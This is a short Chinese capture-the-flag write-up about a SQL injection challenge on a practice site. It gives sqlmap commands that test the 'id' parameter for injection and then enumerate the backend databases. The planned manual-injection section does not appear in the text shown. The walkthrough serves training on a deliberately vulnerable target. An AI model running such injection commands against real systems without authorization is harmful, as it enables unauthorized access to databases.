题目链接:http://ctf5.shiyanbar.com/web/index_3.php
还是一个SQL注入的题目,以下使用SQLMAP爆破的方式以及手工注入的方式来解决这道题目:
(1)sqlmap自动爆破:
首先是尝试看看这个url是否存在注入点:
在kali linux下使用sqlmap:
sqlmap -u http://ctf5.shiyanbar.com/web/index_3.php?id=1
可以测试得到,id这是一个注入点,并且可以得到后台数据库的一些信息
然后可以开始通过暴力破解的方式获取数据库文件的数据库名:
sqlmap -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dbs -v 0